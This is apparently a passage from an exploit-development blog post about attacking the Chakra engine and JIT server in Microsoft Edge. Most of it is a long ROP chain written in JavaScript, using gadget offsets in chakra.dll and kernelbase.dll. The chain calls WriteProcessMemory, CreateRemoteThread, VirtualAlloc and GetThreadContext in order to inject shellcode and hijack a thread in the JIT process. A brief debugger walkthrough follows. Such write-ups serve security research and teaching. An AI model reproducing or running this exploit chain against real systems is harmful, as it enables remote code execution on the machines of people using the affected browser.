write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);      // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

// LPCVOID lpBuffer (R8) (shellcode in chakra.dll .data section)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000, chakraHigh);    	  // .data section of chakra.dll holding our shellcode
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// CreateRemoteThread() ROP chain
// Stage 4 -> Create a thread within the JIT process, but create it suspended
// This will allow the thread to _not_ execute until we are ready
// LPTHREAD_START_ROUTINE can be set to anything, as CFG will check it and we will end up setting RIP directly later
// We will eventually hijack RSP of this thread with a ROP chain, and by setting RIP to a return gadget our thread, when executed, will return into our ROP chain
// We will update the thread later via another ROP chain to call SetThreadContext()

// LPTHREAD_START_ROUTINE lpStartAddress (R9)
// This can be any random data, since it will never be executed
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);	   // 0x180043c63: Anything we want - this will never get executed
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();

// LPSECURITY_ATTRIBUTES lpThreadAttributes (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (default security properties)
next();

// SIZE_T dwStackSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // 0 (default stack size)
next();

// Call KERNELBASE!CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xdcfd0, kernelbaseHigh); // KERNELBASE!CreateRemoteThread
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!CreateRemoteThread)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!CreateRemoteThread - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPVOID lpParameter (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD dwCreationFlags (RSP+0x30) (CREATE_SUSPENDED to avoid executing the thread routine)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPDWORD lpThreadId (RSP+0x38)
next();

// WriteProcessMemory() ROP chain (Number 2)
// Stage 5 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rcx gadget for lpAddress

// Before, we need to preserve the thread HANDLE returned by CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where we will store the thread HANDLE
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
next();

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetOne, chakraHigh); // .data section of chakra.dll where our final ROP chain is
next();                                                                       

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain (Number 3)
// Stage 6 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rdi gadget for our "fake return address"

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
next();

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetTwo, chakraHigh); // .data section of chakra.dll where our final ROP chain is
next();                                                                       

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// VirtualAlloc() ROP chain
// Stage 7 -> Allocate some local memory to store the CONTEXT structure from GetThreadContext

// DWORD flProtect (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // PAGE_READWRITE (0x4)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// LPVOID lpAddress (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (let VirtualAlloc() decide the address)
next();

// SIZE_T dwSize (RDX) (0x4d0 = sizeof(CONTEXT))
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x000004d0, 0x00000000);             // (0x4d0 bytes)
next();

// DWORD flAllocationType (R8) ( MEM_RESERVE | MEM_COMMIT = 0x3000)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT (0x3000)
next();

// Call KERNELBASE!VirtualAlloc
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x5ac10, kernelbaseHigh); // KERNELBASE!VirtualAlloc address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAlloc)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAlloc - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();

// GetThreadContext() ROP chain
// Stage 8 -> Dump the registers of our newly created thread within the JIT process to leak the stack

// First, let's store some needed offsets of our VirtualAlloc allocation, as well as the address itself, in the .data section of kernelbase.dll
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108, kernelbaseHigh); // .data section of kernelbase.dll where we will store the VirtualAlloc allocation
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// Save VirtualAlloc_allocation+0x30. This is the offset in our buffer (CONTEXT structure) that is ContextFlags
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x22b732, chakraHigh);       // 0x18022b732: add rax, 0x10 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll where we will store CONTEXT.ContextFlags
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// We need to set CONTEXT.ContextFlags. This address (0x30 offset from CONTEXT buffer allocated from VirtualAlloc) is in kernelbase+0x21a110
// The value we need to set is 0x10001F
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);        // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a110, kernelbaseHigh); // .data section of kernelbase.dll with CONTEXT.ContextFlags address
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x0010001F, 0x00000000);             // CONTEXT_ALL
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);      // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// HANDLE hThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future mov qword [rax+0x20], rcx gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where our thread HANDLE is
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (RAX already has valid pointer)
next();

// LPCONTEXT lpContext
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108-0x8, kernelbaseHigh); // .data section of kernelbase.dll where our VirtualAlloc allocation is (our CONTEXT structure)
next();                                                                      
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

// Call KERNELBASE!GetThreadContext
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x72d10, kernelbaseHigh); // KERNELBASE!GetThreadContext address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!GetThreadContext)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);       // "return address" for KERNELBASE!GetThreadContext - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38     
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38        
next();

Using the same method of setting a breakpoint on jmp rax we can examine the first gadget in our GetThreadContext ROP chain.

We start off our GetThreadContext ROP chain by preserving the address of our previous VirtualAlloc allocation (which is still in RAX) into the .data section of kernelbase.dll.

The next thing we will do is also preserve our VirtualAlloc allocation, specifically VirtualAlloc_allocation + 0x30 into the .data section of kernelbase.dll, as well. We have already pointed out that CONTEXT.ContextFlags is located at CONTEXT + 0x30 and, since our VirtualAlloc_allocation is acting as our CONTEXT structure, we can think of this as saving our ContextFlags address within the .data section of kernelbase.dll so we can write to it later with our needed 0x10001f value. Since our original base VirtualAlloc allocation was already in RAX, we can simply just add 0x30 to it, and perform another write.

At this point we have successfully saved out CONTEXT address and our CONTEXT.ContextFlags address in memory for persistent storage, for the duration of the exploit.

The next thing we will do is update CONTEXT.ContextFlags. Since we have already preserved the address of ContextFlags in memory (.data section of kernelbase.dll), we can simply pop this address into a register, dereference it, and update it accordingly (the pop rax gadget below is, again, to bypass the cmp instruction that is a residual instruction in our ROP gadget which requires a valid, writable address).

If we actually parse our VirtualAlloc allocation as a CONTEXT structure, we can see we properly set ContextFlags.

At this point our call is in the following state:

VirtualAlloc_buffer.ContextFlags = CONTEXT_ALL		// CONTEXT_ALL = 0x10001f

GetThreadContext(
	-
	-
);

Let’s now step through more of the ROP chain and start out by retrieving our thread’s handle from the .data section of kernelbase.dll.

At this point our call is in the following state:

VirtualAlloc_buffer.ContextFlags = CONTEXT_ALL		// CONTEXT_ALL = 0x10001f

GetThreadContext(
	threadHandle,					// A handle to the thread we want to retrieve a CONTEXT structure for (our thread we created via CreateRemoteThread)
	-
);

For our last parameter, lpContext, we simply just need to pass in the pointer returned earlier from VirtualAlloc (which we stored in the .data section of kernelbase.dll). Again, we use the same mov rdx, [rdx+0x8] gadget we have seen in this blog post. So instead of directly popping the address which points to our VirtualAlloc allocation, we pass in the address - 0x8 so that when the dereference happens, the +0x8 and the -0x8 offset each other. This is done with the following ROP gadgets:

// LPCONTEXT lpContext
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a108-0x8, kernelbaseHigh); // .data section of kernelbase.dll where our VirtualAlloc allocation is (our CONTEXT structure)
next();                                                                      
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);       // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

Our call, after the above gadgets, is now ready to go as such:

VirtualAlloc_buffer.ContextFlags = CONTEXT_ALL		// CONTEXT_ALL = 0x10001f

GetThreadContext(
	threadHandle,					// A handle to the thread we want to retrieve a CONTEXT structure for (our thread we created via CreateRemoteThread)
	addressof(VirtualAlloc_buffer)			// The buffer to receive the CONTEXT structure
);

After executing the call with pt we can see we successfully leaked the stack of the remote thread!

However, if we take a look at the RIP member, which should be a pointer to our ret gadget (theoretically), we can see it is not.

Instead, it is a call to RtlUserThreadStart. This makes total sense, as our thread was created in a suspended state - and wasn’t actually executed yet. So, the entry point of this thread is still on the start function. If we actually debug the JIT process and manually resume this thread (using Process Hacker, for instance), we can see execution actually fails (sorry for the WinDbg classic screenshots):

